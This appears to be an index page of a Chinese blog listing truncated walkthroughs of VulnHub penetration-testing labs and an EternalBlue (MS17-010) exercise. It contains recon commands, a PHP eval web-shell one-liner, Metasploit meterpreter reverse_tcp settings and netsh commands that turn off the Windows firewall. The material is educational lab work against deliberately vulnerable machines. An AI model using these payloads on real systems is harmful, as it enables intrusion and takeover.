『vulnhub系列』Hack Me Please-1
『vulnhub系列』Hack Me Please-1下载地址:1https://www.vulnhub.com/entry/hack-me-please-1,731/
信息搜集:使用nmap进行探测存活主机,发现主机开启了80端口和3306端口
1nmap 192.168.0.*
访问80端口的web服务
使用dirsearch扫描目录,但是并没有可以访问的页面
1dirsearch -u "http://192.168.0.132/"
在main.js发现提示,有一个目录/seeddms51x/seeddms-5.1.22/
访问一下是一个登录页面
现在我们扫描这个目录
1dirsearch -u "http://192.168.0.132/seeddms51x/seeddms-5.1.22/"
访问/install页面
发现install不了
1http://192.168.0.132/seeddms51x/seeddms-5.1.22/install/install.php
说是要在conf目录下创建ENABLE ...
『vulnhub系列』EVILBOX-ONE
『vulnhub系列』EVILBOX-ONE下载地址:1https://www.vulnhub.com/entry/evilbox-one,736/
信息搜集:使用nmap探测内网存活主机,发现开启了22 和 80端口
1nmap 192.168.0.*
访问80端口web服务,发现apache默认页面
使用dirsearch进行目录爆破
1dirsearch -u "http://192.168.0.131"
访问/robots.txt发现一句话,H4x0r 可能是用户名或密码
1Hello H4x0r
访问/secret/ 发现是空白,我们来扫描这个目录,发现没有结果
我们可以尝试换个工具和字典
1gobuster dir -u "http://192.168.0.131/secret/" -w /usr/share/wordlists/dirb/big.txt -x .php
-u 目标url
-w wordlist字典
-x 文件后缀
不知道为什么使用dirb用同样的字典和指定php爆破不出来
1dirsearch ...
『vulnhub系列』Deathnote-1
『vulnhub系列』Deathnote-1下载地址:1https://www.vulnhub.com/entry/deathnote-1,739/
信息搜集:使用nmap扫描存活主机,发现主机开启了22端口和80端口
1nmap 192.168.0.*
访问80端口的web服务,发现apache默认页面
使用dirsearch 进行目录扫描
1dirsearch -u "http://192.168.0.130"
访问robot.txt,说提示就在/important.jpg 中
访问/important.jpg 页面,发现没有东西,查看源码,意思是我们需要的用户名在user.txt中,暂时还找不到user.txt 先按下不表
我们访问wordpress页面,发现网页访问有问题
查看源代码,发现其跳转是使用的域名,我们在攻击机上将deathnote.vuln解析到ip地址
这里使用windows访问的网站,所以在windows中修改host(C:\Windows\System32\drivers\etc\hosts)文件,添加一条解析记录
11 ...
『vulnhub系列』BEELZEBUB- 1
『vulnhub系列』BEELZEBUB- 1下载地址:1https://www.vulnhub.com/entry/beelzebub-1,742/
信息搜集:使用nmap扫描存活主机,发现主机开启了22和80端口
1nmap 192.168.0.*
访问80端口的web服务,发现是apache的默认页面
使用dirsearch扫描目录
1dirsearch -u "http://192.168.0.140/"
发现存在phpmyadmin等页面,访问index.php页面,发现是404 /login也是一样
感觉有猫腻,查看一下源代码,果然发现一行提示
12<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->#我的心被加密了,"beelzebub"不知如何被入侵了,并且被解密了 md5
大概的意思是本来是被加密的,后来被用md5解密了,现在我们使用md5加密一下
1d18e1e22becbd9 ...
『vulnhub系列』doubletrouble-1
『vulnhub系列』doubletrouble-1下载地址1https://www.vulnhub.com/entry/doubletrouble-1,743/
信息搜集使用命令,获得存活靶机IP为138,开启端口22和80
1nmap 192.168.0.* #因为当前NAT模式,攻击机和靶机在一个内网环境中
访问80的web服务,是一个登录页面
又是qdPm,之前做过一个qdpm的题目,于是我们就知道了qdpm存在密码泄露漏洞。我们来看一下
1searchsploit qdpm
我们发现密码泄露漏洞是50176.txt,查看,发现我们可以去http://<website>/core/config/databases.yml 这个目录下,获得数据库的用户名密码
12searchsploit -m 50176.txt #将50176.txt存到当前目录cat 50176.txt
访问后,得到用户名:密码— otis :rush
但我们发现,靶机的3306端口并没有开,继续信息搜集
使用dirsearch爆破目录,得到如下目录,发现secret目录
1di ...
『vulnhub系列』Dripping-Blues-1
『vulnhub系列』Dripping-Blues-1下载地址:1https://www.vulnhub.com/entry/dripping-blues-1,744/
信息搜集:使用nmap进行本地扫描,确定Ip地址为137
1nmap 192.168.0.*
访问80端口web服务,有一串文字,意思大概是被攻击了,然后开了个小玩笑
这个名字可能会有用travisscott & thugger
使用dirsearch扫描目录,只发现robots.txt
1dirsearch -u "http://192.168.0.137/"
访问robots.txt 发现有一个/dripisreal.txt 和/etc/dripispowerful.html ,我们试着访问一下
发现是让我们访问一个歌词网站,并计算其中的“n words”的MD5值,这个值是ssh登录的密码
自己试了一下,我们使用py生成md5值,发现并不行,应该是猜错了,我们继续从别的地方入手
167aff0e8f24f431a9f31899e0c18839b
漏洞利用:因为开 ...
『vulnhub系列』ICA1
『vulnhub系列』ICA1下载地址1https://download.vulnhub.com/ica/ica1.zip
信息搜集如果靶机获取不了IP地址请看这里:『vulnhub系列』JANGOW | Don_Joshua’s Blog (jo4hua.github.io)
使用命令nmap 192.168.0.130 找到存活主机
开启了ssh,http,mysql服务,先访问80端口,进入如下登录界面
使用dirsearch扫描目录
1dirsearch -u "http://192.168.0.136/"
发现数据库配置界面
使用searchsploit qdPM 9.2 发现如下漏洞
一个是csrf现在我们还没到那一步,第二个是密码泄露,我们使用
searchsploit -m 50176.txt 将50176移到当前目录下,使用cat 50176.txt查看
漏洞利用发现访问http://<website>/core/config/databases.yml 网站的这个链接,即可以看到数据库的用户名和密码 ,成功(qdpma ...
『vulnhub系列』EMPIRE-BREAKOUT
『vulnhub系列』EMPIRE-BREAKOUT下载地址1https://www.vulnhub.com/entry/empire-breakout,751/
信息搜集使用nmap扫描内网存活主机
1nmap 192.168.0.*
访问80端口发现apache默认页面
在网页源代码中找到提示
123456<!--don't worry no one will get here, it's safe to share with you my access. Its encrypted :)++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<---------- ...
『vulnhub系列』JANGOW
『vulnhub系列』JANGOW: 1.0.1下载地址1https://www.vulnhub.com/entry/jangow-101,754/
遇到问题发现不能获取ip地址
我们来到初始页面按e,将linux后面的ro改为rw single init=/bin/bash
然后Ctrl+x重启进入如下界面
ip a 查看网卡,发现是ens33
修改配置文件nano /etc/network/interfaces
将下列两个enp0s17修改为ens33
重启,使用nmap扫描,成功获取IP地址
信息搜集由刚才的扫描结果可知,这个机器开启了80端口,访问一下
使用dirsearch扫描目录
1dirsearch -u "http://192.168.0.133/"
发现了刚刚访问的site目录和.backup文件
访问一下.backup 发现数据库信息(数据库名,用户名,密码)
乱点发现代码执行
使用命令执行,写入一句话木马
1echo '<?php @eval($_POST['cmd']);?> ...
永恒之蓝实验
永恒之蓝实验我们通过永恒之蓝漏洞的利用来复现一下到提权和权限维持的windows渗透思路
信息搜集首先扫描局域网内存活主机
1nmap 192.168.0.*
之后使用nmap扫描132主机
1nmap 192.168.0.132
发现目标开启了445端口,可以利用永恒之蓝,进入msfconsole
1msfconsole
漏洞利用扫描msf17-010
1search ms17-010
我们使用第一个,然后查看配置
12use 0show options
设置目标IP和payload
123set rhost 192.168.0.132set payload windows/x64/meterpreter/reverse_tcprun
提权成功,进入shell并修改编码
123getuid #获取system权限shellchcp 65001
关闭防火墙
12**netsh advfirewall set currentprofile state offnetsh advfirewall set privateprofile state off**
开启 ...